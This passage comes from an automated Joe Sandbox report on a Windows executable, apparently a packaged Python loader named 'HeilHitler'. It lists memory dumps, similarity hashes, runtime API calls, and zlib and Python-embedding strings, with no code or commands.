• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                                            • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                            • Instruction ID: 7422d4e8f3036dac261518129888d41113bb2b43793f05dbd5aaa9a8b1a7c904
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63F06D54B0A20240FE5A5EE5985B2B546905F88B80F4C5730CD0FE67E2EE2CE481A210
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF633D70C90,?,?,?,00007FF633D722FA,?,?,?,?,?,00007FF633D73AE9), ref: 00007FF633D7D63A
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction ID: 1a67376a0a3742251bd4409ebce51042f31dabe0049eacb0d2770a301575f88f
• Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction Fuzzy Hash: 7EF0F815F0924A45FE656FF1594377912A05F847A0F480730DD2EE67CAEE2CB580A610
APIs
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65840
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65852
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65889
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6589B
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658B4
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658C6
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658DF
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658F1
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6590D
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6591F
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6593B
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6594D
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65969
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6597B
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65997
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659A9
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659C5
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
• Instruction ID: b818f33a4d21ac703cfeb5d339d36cb22e7caedded4b05944280d23af7ad1323
• Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
• Instruction Fuzzy Hash: FB22CF64A0DB0BD1FA549BD5B8125B433A1FF15781F942335D82EAA7A1FF3CB198B200
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
• Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
• Instruction ID: 5e1c6efec82dc6ffe275985adce9ceb633183f05f9c94d2148d5fed7e3cc9d72
• Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
• Instruction Fuzzy Hash: BDB2C372E182928BE7658EA4D4427FD77B1FB54788F406235DA0DABB84DF38B940DB40
Strings
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID:
• String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
• API String ID: 0-2665694366
• Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
• Instruction ID: 6aa77f26bc38f440468bbe148275264d742b0de6070f1f26b0bc2a897f68337d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC5202B2B186A68BD7A48F55D459B7E3BA9EB44340F814239E69E97780DF3CD800DB00
APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
  • Note: this API set (IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter) is the VC runtime's __scrt_fastfail fallback path; the IsDebuggerPresent call here is CRT support code, not sample-specific anti-debugging.
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
• Instruction ID: 43ff3b8166e9fd1da9e9b85cd0cc03098369cc9465b4e54a762af958436dc8e1
• Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
• Instruction Fuzzy Hash: 92317672608B8586EB60CFA0E8417ED7360FB84704F444139DA5E97B99DF7CD648D710
APIs
• _get_daylight.LIBCMT ref: 00007FF633D85C45
  • Part of subcall function 00007FF633D85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855AC
  • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
  • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
  • Part of subcall function 00007FF633D7A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF633D7A8DF,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7A909
  • Part of subcall function 00007FF633D7A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF633D7A8DF,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7A92E
• _get_daylight.LIBCMT ref: 00007FF633D85C34
  • Part of subcall function 00007FF633D855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D8560C
• _get_daylight.LIBCMT ref: 00007FF633D85EAA
• _get_daylight.LIBCMT ref: 00007FF633D85EBB
• _get_daylight.LIBCMT ref: 00007FF633D85ECC
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF633D8610C), ref: 00007FF633D85EF3
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
• Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
• Instruction ID: 6ec99d33bdb44da6ecf2997ad356caa19763f127bc689be6710b0b8447883afe
• Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
• Instruction Fuzzy Hash: 03D1E426E0824246E720DFA5D8431B96762FF84794F84A235EE0DEBB95DF3CF441A740
APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
• Instruction ID: d85780c84839de040bc3890f67e64cd2644d1c0eb61610f31f65aaa08a9a8677
• Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
• Instruction Fuzzy Hash: 9331A232608F8186DB60CF64E8413AE33A4FB88758F500236EA9D97BA9DF3CD145DB00
APIs
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
• Instruction ID: 74b5afc23294b8b436fcf21b3ec6f5666c4b3d65eb5e36be9ad9fec28f369967
• Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
• Instruction Fuzzy Hash: 85B10762B1869241EA619FA5D4025B9A390FF44BE4F446331EE5EABBC5DF3CF445D300
APIs
• _get_daylight.LIBCMT ref: 00007FF633D85EAA
  • Part of subcall function 00007FF633D855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D8560C
• _get_daylight.LIBCMT ref: 00007FF633D85EBB
  • Part of subcall function 00007FF633D85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855AC
• _get_daylight.LIBCMT ref: 00007FF633D85ECC
  • Part of subcall function 00007FF633D855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855DC
  • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
  • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF633D8610C), ref: 00007FF633D85EF3
Memory Dump Source
• Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
APIs
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
Strings
Similarity
• API ID:
• String ID: $header crc mismatch$unknown header flags set
• API String ID: 0-1127688429
APIs
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
Strings
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                            • API String ID: 0-900081337
                                                                                                                                                                                                                                            • Opcode ID: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                                                                                                                                                                            • Instruction ID: a5b1a32b988a1dfaee414ac612ee252df55af265210d1dbb2408b33029765b12
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2591B7B2A182C68BE7A48E55D449B3E3BA9FF44350F514239DA9ED67C0CF38E940DB40
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                                                                                                                            • API String ID: 0-3030954782
                                                                                                                                                                                                                                            • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                            • Instruction ID: 31c70923b9f728e13ae4adc20dc85de8e43d46ea70eeef49d09ae9247647c225
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D518862B182C186E7258EB5D812769BB91F744B94F488332CB9C8BBD5CF3ED041D700
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1010374628-0
                                                                                                                                                                                                                                            • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                            • Instruction ID: 234171ecab6d92aafaa5d4a9909603b3ea14021a6af1ef4328636cb80422da9e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5702EF61B1D74350FA61AF92A80327A6684AF41BA0F459734ED6DFA7D2DF3DF411A300
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: gfffffff
                                                                                                                                                                                                                                            • API String ID: 0-1523873471
                                                                                                                                                                                                                                            • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                            • Instruction ID: 1afcbe67ad50fea2a5efa46d0a5b7482042ace8cca7d52410eae63c1471e1b2d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46A16762B0C7CA86EB21CF69A4017AA7B91EB54B84F058232DE8D97789DE7DE401D701
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: TMP
                                                                                                                                                                                                                                            • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                            • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                            • Instruction ID: c73461b15bf410eda73629d3ab9e166dab471a7856efec368c98aa0154453f25
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A851EF01F0964341FA64AFA769131BA9290AF44BD5F884235DE0EF7BD6EF3CF446A200
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
